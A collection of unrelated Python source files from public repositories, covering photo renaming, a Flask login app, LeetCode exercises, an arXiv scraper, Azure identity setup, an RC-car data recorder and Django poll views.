    Paths, Path of the camera folder, Path of its renamed counterpart).
    """
    overallCameraDir_renamed = overallCameraDir + " - renamed"
    overallCameraDir_renamedPath = ogcwd/overallCameraDir_renamed
    # makedirs(exist_ok=True) replaces the racy `if not exists: mkdir` pattern.
    os.makedirs(overallCameraDir_renamedPath, exist_ok=True)
    overallCameraDirPath = ogcwd/overallCameraDir
    # Collect the camera's period subdirectories (entries that are directories
    # and are not themselves '- renamed' output folders).
    cameraSubdirList = []
    for entry in os.listdir(overallCameraDirPath):
        if os.path.isdir(overallCameraDirPath/entry) and "renamed" not in entry:
            cameraSubdirList.append(entry)
    cameraSubdirList_renamed = []
    for index in range(len(cameraSubdirList)):
        subdirectory_renamed = cameraSubdirList[index] + " - renamed"
        # Replace the bare name with its full Path, as callers expect.
        cameraSubdirList[index] = overallCameraDirPath/cameraSubdirList[index]
        subdirectory_renamedPath = overallCameraDir_renamedPath/subdirectory_renamed
        cameraSubdirList_renamed.append(subdirectory_renamedPath)
        os.makedirs(subdirectory_renamedPath, exist_ok=True)
        print(subdirectory_renamed)
    return cameraSubdirList, cameraSubdirList_renamed, overallCameraDirPath, overallCameraDir_renamedPath
# In[8]:
def renamingPhotosInSingleDirectory(directoryPath, renameddirectoryPath, cameraCode: "2 letter camera code") -> None:
    """Copy every JPEG in one directory into `renameddirectoryPath`, renamed to
    '<original name>-<camera code>-<YYYY-MM-DD>[-<species>].<ext>'.

    The capture date comes from each photo's EXIF "DateTimeOriginal" tag; the
    species (if any) comes from matching against the module-level
    `relabeledPhotoNames` list.  Photos with a recognized species land in a
    per-species subfolder, everything else in "miscellaneous".  Call once per
    subdirectory when a camera has several photo-period subdirectories.
    Depends on module-level `relabeledPhotoNames`, PIL's `Image` and `TAGS`.
    NOTE(review): assumes photo names contain no '.' besides the extension,
    and that every photo has a DateTimeOriginal tag (KeyError otherwise).
    """
    # Keep only JPEG files (by extension, case-insensitive).
    files = os.listdir(directoryPath)
    ogImages = []
    for file in files:
        extension = file.split(".")[-1]
        if extension.lower() == "jpg" or extension.lower() == "jpeg":
            ogImages.append(file)
    for OldImage in ogImages:
        # Read the photo's EXIF metadata into a {tag name: value} dict.
        PILimage = Image.open(directoryPath/OldImage)
        exifOldImage = PILimage.getexif()
        tagsList = []
        dataList = []
        for tag_id in exifOldImage:
            # get the tag name, instead of human unreadable tag id
            tag = TAGS.get(tag_id, tag_id)
            data = exifOldImage.get(tag_id)
            # decode bytes
            if isinstance(data, bytes):
                try:
                    data = data.decode()
                except:
                    print("Unicode decode error for " + OldImage + "; Should be inconsequential.")
            tagsList.append(tag)
            dataList.append(data)
        metadata = {tagsList[index]: dataList[index] for index in range(len(tagsList))}
        # EXIF dates look like "YYYY:MM:DD HH:MM:SS"; reformat to YYYY-MM-DD.
        dateTime = metadata["DateTimeOriginal"]
        dateTimeList = dateTime.split(" ")
        dateComponents = dateTimeList[0].split(":")
        year = dateComponents[0]
        month = dateComponents[1]
        day = dateComponents[2]
        formattedDate = "-".join([year, month, day])
        oldImageNameParts = OldImage.split(".")
        oldImageName = oldImageNameParts[0]
        fileExtension = "." + oldImageNameParts[1]
        newImageNameList = [oldImageName, cameraCode, formattedDate]
        temporaryName = "-".join(newImageNameList)
        # Look for this photo in the relabeled-photos list; on a match, adopt
        # the CSV's full name (which carries the species as its last segment).
        speciesList = []
        for image in relabeledPhotoNames:
            ogImageNameList = image.split("-")
            ogImageName = ogImageNameList[0]
            ogImageCameraCode = ogImageNameList[1]
            ogImageDateParts = [ogImageNameList[2], ogImageNameList[3], ogImageNameList[4]]
            ogImageFormattedDate = "-".join(ogImageDateParts)
            if (ogImageName in oldImageName and ogImageCameraCode == cameraCode and ogImageFormattedDate == formattedDate) or (temporaryName in image):
                print("The original image name on the relabeled photos csv is {}".format(ogImageName))
                species = ogImageNameList[-1]
                temporaryName = image
                if species not in speciesList:
                    speciesList.append(species)
                break
        # Collapse multi-animal labels into two umbrella categories.
        wildAnimals = ["bird and raccoon", "rabbit and bird",
                       "rabbit and coyote", "rabbit and unknown animal(s)"]
        wildAnimalAndHuman = ["bird and human", "human + dog + rabbit", "rabbit and human"]
        processedSpeciesList = []
        for index in range(len(speciesList)):
            if speciesList[index] not in wildAnimals and speciesList[index] not in wildAnimalAndHuman:
                processedSpeciesList.append(speciesList[index])
            elif speciesList[index] in wildAnimals and "wild animals" not in processedSpeciesList:
                processedSpeciesList.append("wild animals")
            elif speciesList[index] in wildAnimalAndHuman and "animal and human" not in processedSpeciesList:
                processedSpeciesList.append("animal and human")
        speciesList = processedSpeciesList
        # Ensure a destination folder exists for each recognized species.
        for species in speciesList:
            speciesFolderPath = renameddirectoryPath/species
            if os.path.exists(speciesFolderPath) == False:
                os.mkdir(speciesFolderPath)
        # The species (if matched) is the last '-'-separated segment of the
        # adopted CSV name; otherwise it is the date's day component and the
        # photo falls through to "miscellaneous" below.
        temporaryNameSplitted = temporaryName.split("-")
        species = temporaryNameSplitted[-1]
        newImageName = temporaryName + fileExtension
        oldImagePath = str(directoryPath/OldImage)
        miscellaneousFolderPath = renameddirectoryPath/"miscellaneous"
        if os.path.exists(miscellaneousFolderPath) == False:
            os.mkdir(miscellaneousFolderPath)
        if species in speciesList or species in wildAnimals or species in wildAnimalAndHuman:
            if species in wildAnimals:
                species = "wild animals"
            elif species in wildAnimalAndHuman:
                species = "animal and human"
            speciesFolderPath = renameddirectoryPath/species
            newImagePath = str(speciesFolderPath/newImageName)
        else:
            newImagePath = str(miscellaneousFolderPath/newImageName)
        print(newImageName)
        # Copy (never move) the photo, skipping already-renamed duplicates.
        if os.path.exists(newImagePath) == False:
            shutil.copy(oldImagePath, newImagePath)
    return
# In[9]:
# Sanity check: photo count per species in the relabeled-photos CSV.
speciesCounts = relabeledPhotos.groupby("Species")["Species"].count()
# Bare expression: notebook-display artifact.
speciesCounts
# In[10]:
def renamePhotosInCamera(cameraName: "string representing name of camera folder", cameraCode: "2-letter camera code"):
    """Rename every photo belonging to one camera.

    First builds the '- renamed' output tree via makeRenamedDirectories(),
    then runs renamingPhotosInSingleDirectory() either once on the camera
    folder itself (flat layout) or once per photo-period subdirectory.
    """
    subdirPaths, subdir_renamedPaths, cameraPath, renamedCameraPath = makeRenamedDirectories(cameraName)
    if not subdirPaths:
        # Flat layout: photos sit directly inside the camera folder.
        renamingPhotosInSingleDirectory(cameraPath, renamedCameraPath, cameraCode)
    else:
        # Nested layout: one subdirectory per photo period.  (The original
        # `elif len(...) > 0` was redundant -- a list length is never < 0.)
        for subdirPath, subdir_renamedPath in zip(subdirPaths, subdir_renamedPaths):
            renamingPhotosInSingleDirectory(subdirPath, subdir_renamedPath, cameraCode)
    return
# In[11]:
# renamePhotosInCamera("Bonita Canyon (Under the Bridge)", "BC")
# renamePhotosInCamera("Research Park", "RP")
# renamePhotosInCamera("test camera", "AT")
# ## Research Park
# In[12]:
# renamePhotosInCamera("1_Respark_032219_040419", "RP")
# In[13]:
# renamePhotosInCamera("2_Respark_040419_042519", "RP")
# In[14]:
# renamePhotosInCamera("3_Respark_042519_050919", "RP")
# In[15]:
# renamePhotosInCamera("4_Respark_050919_052319", "RP")
# Here's some code to check the species distribution of the actual renamed photos vs the csv file of relabeled animal photos. This chunk was originally written to look at the species distribution of the actual renamed photos in Research Park, NOT the relabeled animal photos of Research Park in the csv file of relabeled animal photos. However, this chunk of code can be customized for other cameras as well. Please customize this however you see fit.
# In[16]:
# renamedFolders = []
# for directory in dirList:
# if "renamed" in directory:
# renamedFolders.append(directory)
# overallCounts = []
# for indexRenamed in range(len(renamedFolders)):
# directoryPath = ogcwd/renamedFolders[indexRenamed]
# speciesFolders = os.listdir(directoryPath)
# folderName = renamedFolders[indexRenamed]
# for indexSpecies in range(len(speciesFolders)):
# speciesFolderPath = directoryPath/speciesFolders[indexSpecies]
# speciesFolder = speciesFolders[indexSpecies]
# speciesCount = len(os.listdir(speciesFolderPath))
# entry = [folderName, speciesFolder, speciesCount]
# print(entry)
# overallCounts.append(entry)
# columnLabels = ["Photo period", "Species", "Count"]
# researchParkCounts = pd.DataFrame(data = overallCounts, columns = columnLabels)
# researchParkCounts
# counts = researchParkCounts.groupby("Species")["Count"].sum()
# counts
# In conclusion, I think that my renaming algorithm keeps similar enough species proportions despite the renaming algorithm resulting in some animal photos being misclassified as "miscellaneous", so the actual number of animal photos for certain animals are lower. This lowering is due to initial human error (just error that's not from me) from entering data into the spreadsheets that were compiled into the overall Camera_METADATA_UCI spreadsheet and then analyzed by me. The dates the CEB interns or anyone who manually reviewed photos entered into these spreadsheets were different from the dates in the actual photo.
| briannhan/machine-learning-code | Renaming photos/Renaming photos.py | Renaming photos.py | py | 14,700 | python | en | code | 0 | github-code | 13 |
14383128855 | from flask import Flask, render_template, request
from flask_mysqldb import MySQL
app = Flask(__name__)

# flask_mysqldb connection settings for the "bank" database.
# NOTE(review): credentials are hard-coded in source; move them to
# environment variables or an untracked config file before deploying.
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'xxxxxxxxxxxxxxx'
app.config['MYSQL_DB'] = 'bank'

mysql = MySQL(app)
@app.route('/', methods=['GET', 'POST'])
def index():
    """Landing endpoint: always responds with a fixed greeting."""
    greeting = "hello ilabs geeks ! "
    return greeting
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Serve the login form on GET; on POST, look the submitted name up in
    the MySQL `users` table.

    Returns a greeting string when the user exists, an 'unknown user'
    string otherwise, and the rendered form for plain GET requests.
    """
    if request.method == "POST":
        details = request.form
        firstName = details['fname']
        cur = mysql.connection.cursor()
        # Parameterized query -- never interpolate user input into SQL.
        cur.execute("SELECT COUNT(*) from users where name= (%s)", [firstName])
        result = cur.fetchone()
        cur.close()
        # Bug fix: compare the fetched COUNT numerically.  The old
        # `str(result) == '(0,)'` matched the tuple's repr, which is
        # driver/row-format dependent and silently breaks.
        if result is None or result[0] == 0:
            return 'unknown user : ' + firstName
        return 'Welcome : ' + firstName + ' ' + str(result)
    return render_template('index.html')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
| julienmiquelilab/ilab | app-IN-cloud-TP1.py | app-IN-cloud-TP1.py | py | 1,222 | python | en | code | 0 | github-code | 13 |
# Definition for a binary tree node.
class TreeNode(object):
    """A binary-tree node: a payload value plus optional left/right children."""

    def __init__(self, x, left=None, right=None):
        # Bind the value and both subtree links in a single statement.
        self.val, self.left, self.right = x, left, right
class Solution(object):
    def isSubtree(self, s, t):
        """Return True if tree ``t`` occurs as a subtree of ``s``.

        :type s: TreeNode
        :type t: TreeNode
        :rtype: bool

        Serializes each tree with unambiguous delimiters and reduces the
        problem to substring search: '#' prefixes every value and '$' marks
        an empty child, so values like [12] and [2] cannot collide.
        """
        def convert(p):
            return "#" + str(p.val) + convert(p.left) + convert(p.right) if p else "$"

        # NOTE: the original carried an unreachable DFS implementation after
        # this return; it has been removed as dead code.
        return convert(t) in convert(s)

    def compare_val(self, s, t):
        """Return True if the trees rooted at ``s`` and ``t`` are identical.

        Kept as a public helper: the alternative O(|s|*|t|) approach walks
        ``s`` and runs this structural comparison from every candidate node.
        """
        if not s and not t:
            return True
        if s and t and s.val == t.val:
            return self.compare_val(s.left, t.left) and self.compare_val(s.right, t.right)
        return False
s = Solution()
a = s.isSubtree(TreeNode(1,TreeNode(1)),TreeNode(1))
print(a)
| littleliona/leetcode | easy/572.subtree_of_another_tree.py | 572.subtree_of_another_tree.py | py | 1,527 | python | en | code | 0 | github-code | 13 |
41379836944 | # import libraries
from urllib.request import urlopen
import csv
from bs4 import BeautifulSoup
# Advanced-search results page on arXiv (200 results per page, offset 3200).
quote_page = "https://arxiv.org/search/advanced?advanced=&terms-0-operator=AND&terms-0-term=Machine+Learning&terms-0-field=title&classification-computer_science=y&classification-economics=y&classification-eess=y&classification-mathematics=y&classification-physics=y&classification-physics_archives=all&classification-q_biology=y&classification-q_finance=y&classification-statistics=y&classification-include_cross_list=include&date-year=&date-filter_by=date_range&date-from_date=2009&date-to_date=2019&date-date_type=announced_date_first&abstracts=show&size=200&order=announced_date_first&start=3200"
# NOTE(review): network request happens at import time with no error handling.
page = urlopen(quote_page).read()
soup = BeautifulSoup(page, 'html.parser')
# Header text such as "Showing 1–200 of N results"; index 3 grabs the total.
papersAll = soup.find("h1", attrs={"class": "title is-clearfix"}).text
total_papers = papersAll.strip().split(" ")[3]
# Collect paper titles (newlines and commas stripped for CSV safety).
individualTitles = []
for line in soup.find_all("p", attrs={"class": "title is-5 mathjax"}):
    line = line.text
    line = line.strip()
    line = line.replace("\n", "")
    line = line.replace(",", "")
    individualTitles.append(line)
# Collect "originally announced" dates from the metadata paragraphs.
individualAnnounceDate = []
for line in soup.find_all("p", attrs={"class": "is-size-7"}):
    line = line.text
    line = line.strip()
    line = line.replace("\n", "")
    line = line.replace(",", "")
    line = line.split("originally announced")
    if (len(line) == 2):
        individualAnnounceDate.append(line[1][1:-1])
# Collect author lists; [8:] drops the leading "Authors:" label.
individualAuthors = []
for line in soup.find_all("p", attrs={"class": "authors"}):
    line = line.text
    line = line.replace("\n", "")[8:]
    # line = line.replace(",", "")
    line = ' '.join(line.split())
    # line = line.split(",")
    print(line)
    individualAuthors.append(line)
# Append one row per paper to index.csv.
# NOTE(review): `individualTitles[i][0]` writes only the FIRST CHARACTER of
# the title — this looks like a bug; probably meant `individualTitles[i]`.
for i in range(len(individualAnnounceDate)):
    with open("index.csv", "a") as csv_file:
        writer = csv.writer(csv_file)
        writer.writerow([individualTitles[i][0], individualAnnounceDate[i], individualAuthors[i]])
| amysen/BR_Algothon | cornell_scraper.py | cornell_scraper.py | py | 1,918 | python | en | code | 1 | github-code | 13 |
6768252735 | import pandas as pd
import matplotlib.pyplot as plt
def show_overview(data):
    """Print a quick overview of *data*: shape, first ten rows, summary stats.

    :param data: pandas DataFrame to describe.
    """
    # DataFrame shape (f-string replaces the redundant str()+format chain).
    print(f'Shape of DataFrame is: {data.shape}\n')
    # First 10 rows.
    print('First 10 rows look like this:')
    print(data.head(10))
    # Summary statistics of the numeric columns.
    print('\nDataframe stats are:')
    print(data.describe())
"""
Create boxplot of all, or selected columns.
"""
def boxplot(data, columns=[]):
if columns == []:
data.plot.box()
else:
data[columns].plot.box()
plt.show()
"""
Create lineplot of target through time.
"""
def target_lineplot(data):
data['Target'].plot()
plt.show()
"""
Invoke all eda
"""
def eda(data, columns=[]):
show_overview(data)
boxplot(data, columns)
target_lineplot(data)
| asicoderOfficial/mas_stock_prediction | src/eda.py | eda.py | py | 767 | python | en | code | 2 | github-code | 13 |
3481263724 | import RPi.GPIO as GPIO
import time as time
import sys
# Geiger-style pulse counter: counts falling edges on GPIO pin 17 and logs
# per-interval counts to a timestamped CSV file.
timestamp = 0
count = 0
r = []
#time.sleep(90) # REMOVE AFTER GOING BACK INSIDE
print(sys.argv)
# NOTE(review): interval/num_intervals/name are only bound when enough CLI
# args are given; with fewer args the code below raises NameError.
if len(sys.argv) > 1:
    interval = int(sys.argv[1]) # Seconds between each measurement
if len(sys.argv) > 2:
    num_intervals = int(sys.argv[2]) # number of intervals measured
if len(sys.argv) > 3:
    name = str(sys.argv[3])
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.IN)
def my_callback(channel):
    # Interrupt handler: one falling edge = one detected event.
    global count
    count += 1
    print("fallen")
GPIO.add_event_detect(17, GPIO.FALLING, callback = my_callback)
# NOTE(review): file is never closed explicitly; a `with` block (or
# myFile2.close() at the end) would guarantee the data is flushed.
myFile2 = open(name + "_" + str(round(time.time()))+".csv", "w")
myFile2.write("Counts," + " Timestamp" + "\n")
# Main loop: one tick per second; every `interval` seconds, record the
# accumulated count and reset it.
while timestamp <= num_intervals * interval:
    timestamp += 1
    if timestamp % interval == 0:
        r.append([count, timestamp])
        myFile2.write(str(count) + ", " + str(timestamp) + "\n")
        count = 0
        # timestamp = 0
        print("looped")
        print(count)
        print(r)
    time.sleep(1)
| srajadnya1/E11-Labwork | rad_sensor.py | rad_sensor.py | py | 996 | python | en | code | 0 | github-code | 13 |
12871052855 | """
Problem statement:
Design a system that manages the reservation state of n seats that are numbered from 1 to n.
Implement the SeatManager class:
* SeatManager(int n) Initialize a SeatManager object that will manage n seats numbered from 1 to n. All seats are initially available.
* int reserve() Fetches the smallest-numbered unreserved seat, reserves it, and returns its number.
* void unreserve(int seatNumber) Unreserves the seat with the given seatNumber.
Example 1:
Input
["SeatManager", "reserve", "reserve", "unreserve", "reserve", "reserve", "reserve", "reserve", "unreserve"]
[[5], [], [], [2], [], [], [], [], [5]]
Output
[null, 1, 2, null, 2, 3, 4, 5, null]
Explanation
SeatManager seatManager = new SeatManager(5); // Initializes a SeatManager with 5 seats.
seatManager.reserve(); // All seats are available, so return the lowest numbered seat, which is 1.
seatManager.reserve(); // The available seats are [2,3,4,5], so return the lowest of them, which is 2.
seatManager.unreserve(2); // Unreserve seat 2, so now the available seats are [2,3,4,5].
seatManager.reserve(); // The available seats are [2,3,4,5], so return the lowest of them, which is 2.
seatManager.reserve(); // The available seats are [3,4,5], so return the lowest of them, which is 3.
seatManager.reserve(); // The available seats are [4,5], so return the lowest of them, which is 4.
seatManager.reserve(); // The only available seat is seat 5, so return 5.
seatManager.unreserve(5); // Unreserve seat 5, so now the available seats are [5].
Constraints:
* 1 <= n <= 10^5
* 1 <= seatNumber <= n
* For each call to reserve, it is guaranteed that there will be at least one unreserved seat.
* For each call to unreserve, it is guaranteed that seatNumber will be reserved.
* At most 10^5 calls in total will be made to reserve and unreserve.
Hints:
* You need a data structure that maintains the states of the seats. This data structure should also allow you to get the first available seat and flip the state of a seat in a reasonable time.
* You can let the data structure contains the available seats. Then you want to be able to get the lowest element and erase an element, in a resonable time.
* Ordered sets support these operations.
NOTE: There is a better approach check this out here: https://leetcode.com/problems/seat-reservation-manager/editorial/?envType=daily-question&envId=2023-11-06
"""
class SeatManagerTLE:

    def __init__(self, n: int):
        """Track free and taken seats with two plain sets.

        ``reserve`` scans the free set with ``min`` on every call, which is
        O(n) per reservation — too slow for large inputs (hence "TLE").
        """
        self.available_seat = set(range(1, n + 1))
        self.occupied_seat = set()  # type: set

    def reserve(self) -> int:
        """Reserve and return the lowest-numbered available seat."""
        lowest = min(self.available_seat)  # linear scan; a heap would be O(log n)
        self.available_seat.discard(lowest)
        self.occupied_seat.add(lowest)
        return lowest

    def unreserve(self, seatNumber: int) -> None:
        """Release a previously reserved seat back into the free pool."""
        self.available_seat.add(seatNumber)
        self.occupied_seat.discard(seatNumber)
from heapq import heapify, heappop, heappush
class SeatManager:

    def __init__(self, n: int):
        """Keep the free seats in a min-heap so the cheapest seat pops in O(log n)."""
        self.available_seat = list(range(1, n + 1))
        heapify(self.available_seat)  # already sorted, but heapify is cheap insurance

    def reserve(self) -> int:
        """Pop and return the smallest available seat number."""
        return heappop(self.available_seat)

    def unreserve(self, seatNumber: int) -> None:
        """Push a released seat back onto the free-seat heap."""
        heappush(self.available_seat, seatNumber)
# Your SeatManager object will be instantiated and called as such:
# obj = SeatManager(n)
# param_1 = obj.reserve()
# obj.unreserve(seatNumber)
if __name__ == '__main__':
    # Replays the example from the problem statement; expected prints:
    # 1, 2, 2, 3, 4, 5.
    obj = SeatManager(n=5)
    print(obj.reserve())
    print(obj.reserve())
    obj.unreserve(seatNumber=2)
    print(obj.reserve())
    print(obj.reserve())
    print(obj.reserve())
    print(obj.reserve())
    obj.unreserve(seatNumber=5)
pass | Nacriema/Leet-Code | daily_challenges/seat-reservation-manager.py | seat-reservation-manager.py | py | 4,632 | python | en | code | 0 | github-code | 13 |
35997219576 |
import uuid

import backoff
from azure.core.exceptions import HttpResponseError
from azure.core.exceptions import ResourceNotFoundError
from azure.mgmt.authorization import AuthorizationManagementClient
from azure.mgmt.msi import ManagedServiceIdentityClient

import utils
@backoff.on_exception(backoff.expo, HttpResponseError, max_time=300)
@utils.Decorator()
def assign_role_to_rg(cli_args, resource_group, msi_principal_id):
    """Grant the managed identity the Contributor role on a resource group.

    NOTE(review): as written, `uuid` and `HttpResponseError` are referenced
    but not imported at the top of this module — confirm the import block.
    """
    resource_client = AuthorizationManagementClient(cli_args.credential, cli_args.subscription_id, '2018-01-01-preview')
    # Get "Contributor" built-in role as a RoleDefinition object
    role_name = 'Contributor'
    roles = list(resource_client.role_definitions.list(
        resource_group.id,
        filter="roleName eq '{}'".format(role_name)
    ))
    # Exactly one built-in "Contributor" definition is expected.
    assert len(roles) == 1
    contributor_role = roles[0]
    return resource_client.role_assignments.create(
        resource_group.id,
        uuid.uuid4(),  # Role assignment random name
        {
            'role_definition_id': contributor_role.id,
            'principal_id': msi_principal_id,
            'principal_type': "ServicePrincipal",
        }
    )
@utils.Decorator()
def get(cli_args):
    """Fetch the user-assigned managed identity named in ``cli_args``.

    NOTE(review): `ManagedServiceIdentityClient` is used here but not
    imported at the top of this module — confirm the import block.
    """
    resource_client = ManagedServiceIdentityClient(cli_args.credential, cli_args.subscription_id)
    return resource_client.user_assigned_identities.get(
        cli_args.resource_group,
        cli_args.msi_name,
    )
@utils.Decorator()
def create(cli_args):
    """Create (or update) the user-assigned managed identity in ``cli_args.region``."""
    resource_client = ManagedServiceIdentityClient(cli_args.credential, cli_args.subscription_id)
    return resource_client.user_assigned_identities.create_or_update(
        cli_args.resource_group,
        cli_args.msi_name,
        {
            "location": cli_args.region,
        }
    )
def get_or_create(args, nsg):
    """Return the managed identity, creating it when it does not exist.

    :param args: CLI arguments carrying credential/subscription/resource info.
    :param nsg: accepted for signature compatibility with existing callers;
        the underlying ``create`` call does not take it — TODO confirm intent.
    """
    try:
        msi = get(args)
    except ResourceNotFoundError:
        # Identity is missing -> provision it. The original passed ``nsg``
        # as a second positional argument, but ``create(cli_args)`` accepts
        # only one argument, so that call always raised TypeError.
        msi = create(args)
    return msi
| crodriguezde/reimage | msi.py | msi.py | py | 1,797 | python | en | code | 0 | github-code | 13 |
3720816290 | '''
풀다가 엇나감
긴 코드를 함수로 자르는 연습 더 해야함
'''
from collections import deque
import sys
global INT_MAX
INT_MAX = sys.maxsize
n,m = map(int,input().split()) # m = 병원
grid =[
list(map(int,input().split()))
for _ in range(n)
]
# 빈칸인 경우 0, 사람인 경우 1, 병원인 경우 2
visited = [
[0 for _ in range(n)]
for _ in range(n)
]
result = [
[INT_MAX for _ in range(n)]
for _ in range(n)
]
dx, dy = [-1,1,0,0],[0,0,-1,1]
def visited_initialization():
    """Reset the global ``visited`` grid: mark every cell as unvisited (0)."""
    for row in visited:
        for col in range(n):
            row[col] = 0
def result_initialization():
    """Reset the global ``result`` grid: every distance back to 'infinity'."""
    global INT_MAX
    for row in result:
        for col in range(n):
            row[col] = INT_MAX
def in_range(x, y):
    """True iff cell (x, y) lies on the global n x n board."""
    inside_rows = 0 <= x < n
    inside_cols = 0 <= y < n
    return inside_rows and inside_cols
def can_go(x, y, dist):
    """A cell is enterable when it is on the board, not yet visited, and
    this path is no longer than the best distance recorded so far."""
    return (in_range(x, y)
            and visited[x][y] != 1
            and dist <= result[x][y])
def bfs():
    """Multi-source BFS from every queued start cell, filling the global
    ``result`` grid with shortest distances (mutates visited/result/q)."""
    while q:
        x,y,dist = q.popleft() # row, column, distance so far
        dist += 1 # extend the path by one step
        for i in range(4):
            new_x,new_y = x + dx[i], y + dy[i]
            if can_go(new_x, new_y,dist):
                visited[new_x][new_y] = 1
                result[new_x][new_y] = dist # record the shortest distance
                q.append([new_x, new_y, dist])
def cal_dist(grid, result):
    """Sum, over every person cell (value 1), the recorded BFS distance."""
    return sum(result[i][j]
               for i in range(n)
               for j in range(n)
               if grid[i][j] == 1)
def choice_hospital(grid):
    """Try every combination of m hospitals, BFS from each choice, and track
    the minimum total person-to-hospital distance in global ``min_val``."""
    global min_val
    # NOTE(review): the column loop uses range(m) — for an n x n board this
    # looks like a bug (should probably be range(n)); confirm intent.
    hospital_info = []
    hospitals = []
    for i in range(n):
        for j in range(m):
            if grid[i][j] == 2:
                hospital_info.append([i,j])
    #print(hospital_info)
    # print("?")
    combination = []
    def print_combination():
        # Evaluate one chosen combination: mark chosen hospitals as 3,
        # run BFS from them, and update the global minimum.
        global min_val
        #print(combination)
        hospitals = []
        temp = []
        for c in combination:
            temp.append(hospital_info[c-1])
        #print(temp)
        # NOTE(review): this builds a flat list of n*n zeros, then only the
        # first n slots are overwritten with row copies — it works, but a
        # plain [row[:] for row in grid] would be clearer.
        grid_copied = [0 for _ in range(n) for _ in range(n)]
        for i in range(n):
            grid_copied[i] = grid[i][:]
        for x,y in temp:
            grid_copied[x][y] = 3
            #print(x,y)
        for i in range(n):
            for j in range(n):
                if grid_copied[i][j] == 3: # starting point (a chosen hospital)
                    print('start',i,j)
                    visited[i][j] = 1
                    dist = 1
                    q.append([i, j, 0])
        bfs()
        for k in range(n):
            for kk in range(n):
                print(result[k][kk],end=' ')
            print()
        min_val = min(cal_dist(grid_copied, result), min_val)
        # Reset shared state before the next combination.
        visited_initialization()
        result_initialization()
        print(min_val)
        #print(temp)
        #print(hospital_info[c-1], end=' ')
        #hospitals.append(temp)
        #print(hospitals)
        #return hospitals
        # print()
    def find_combination(curr_num, cnt):
        # Classic include/exclude recursion over hospital indices 1..len.
        if curr_num == len(hospital_info) + 1:
            if cnt == m:
                print_combination()
            return
        combination.append(curr_num)
        find_combination(curr_num + 1, cnt + 1)
        combination.pop()
        find_combination(curr_num + 1, cnt)
    find_combination(1, 0)
# Shared BFS queue and running minimum, then kick off the search.
q = deque()
# NOTE(review): `global` at module level is a no-op.
global min_val
min_val = INT_MAX
choice_hospital(grid)
| JaeEon-Ryu/Coding_test | LeeBrosCode/코테2.py | 코테2.py | py | 3,495 | python | en | code | 1 | github-code | 13 |
18719739725 | import io
import os
import socket
import struct
import cv2
import time
import numpy as np
import pygame
from PIL import Image
from pygameControl import CV2PYGAME, RCControl
# TCP server that receives a JPEG stream from the RC car and records
# (image, command) training pairs driven by pygame key presses.
server_socket = socket.socket()
#data collected from stream and pygame controls will be save to:
train_data = []
file_name = 'training_ether_final.npy'
# Resume an existing training set if one is on disk.
if os.path.isfile(file_name):
    print("file exists, opening file...")
    train_data = list(np.load(file_name))
else: print("file does not exists, create new")
#pygame object to directly control the car
pygameControl = RCControl()
#The image contains a lot of redundant info. So we are going to filter through it
#and find what we really need
##def processImage(img):
##    img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
##    return img[140:,:]
def startListening():
    """Accept one client, then loop: read a length-prefixed JPEG frame,
    show/record it, and forward pygame key presses to the RC car.

    Each frame is preceded by a little-endian uint32 length; a length of 0
    (or quitting pygame) ends the session.
    """
    server_socket.bind(('0.0.0.0', 6116))
    server_socket.listen(0)
    connection = server_socket.accept()[0].makefile('rb')
    command_key = 6
    startGatheringData = False # can be use as a pause
    try:
        count = 0
        clock = pygame.time.Clock()
        while(True):
            #start = time.time()
            image_len = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]
            #if the client sends image len of 0, exit
            # NOTE(review): `cv2.waitKey(5) & 0xFF == 'q'` compares an int to
            # a str, so it is always False — probably meant ord('q').
            if ((pygameControl.QUIT) | (not image_len) | (cv2.waitKey(5) & 0xFF == 'q') ):
                #stop RC car and exit after 100 data points or the streaming stop
                pygameControl.simpleControl(6)
                pygameControl.quit()
                cv2.destroyAllWindows()
                break
            #convert back into image
            image_stream = io.BytesIO()
            image_stream.write(connection.read(image_len))
            image_stream.seek(0)
            # NOTE(review): np.fromstring is deprecated; np.frombuffer is the
            # modern equivalent.
            data = np.fromstring(image_stream.getvalue(), dtype = np.uint8)
            image = cv2.imdecode(data,1)
            #The original image is just too big to store, and i don't feel like the neuronet need such a large pixel image to detect features
            gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
            imageResized = cv2.resize(gray, (480,360))
            pygameControl.setScreen(CV2PYGAME(cv2.flip(image, 1)))
            #getKeys() return True if there are changes in the pressed arrow
            if(pygameControl.getKeys()):
                command_key = pygameControl.getCommand()
                pygameControl.simpleControl(command_key) #.001s
            #if there are charnges, signal start gathering data
            #Pause the data collection process by pressing key 'p'
            #start the data collection process by pressing key 's'
            pressed = pygameControl.P()
            if(pressed[0]):
                print("pause gathering data")
                startGatheringData = False
            if(pressed[1]):
                print("start gathering data")
                startGatheringData = True
            if(startGatheringData):
                count+=1
                train_data.append([imageResized, command_key])
                if(count%200 == 0):
                    print("have collected {} data points".format(count))
            # Cap the loop at 60 iterations per second.
            clock.tick(60)
            #end = time.time()
            #print("time per loop:",end-start)
    finally:
        connection.close()
        server_socket.close()
# Run one capture session, then persist the accumulated training pairs.
startListening()
np.save(file_name,train_data)
| herobaby71/Self-driving-RC-Car | LaptopServerDataCollection.py | LaptopServerDataCollection.py | py | 3,422 | python | en | code | 0 | github-code | 13 |
3464690631 | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, Http404, JsonResponse
from .models import Question, Test, Filters
from django.template import loader
from django.shortcuts import render
import json
def index(request):
    """Render the five most recently published questions."""
    latest_question_list = Question.objects.order_by('-pub_date')[:5]
    return render(request, 'polls/index.html',
                  {'latest_question_list': latest_question_list})
def detail(request, question_id):
    """Render the detail page for one question; 404 when it does not exist."""
    return render(request, 'polls/detail.html',
                  {'question': get_object_or_404(Question, pk=question_id)})
def results(request, question_id):
    """Placeholder results page for a question."""
    message = "You're looking at the results of question %s." % question_id
    return HttpResponse(message)
def vote(request, question_id):
    """Placeholder vote endpoint for a question."""
    message = "You're voting on question %s." % question_id
    return HttpResponse(message)
"""
Graphic type, 0,1,2,3, each refers to red, green, blue, red and green.
"""
def getTestGraphics(request, graphicType):
path = r""
with open(path, 'rb') as f:
img = f.read()
return HttpResponse(img, content_type='image/png')
"""
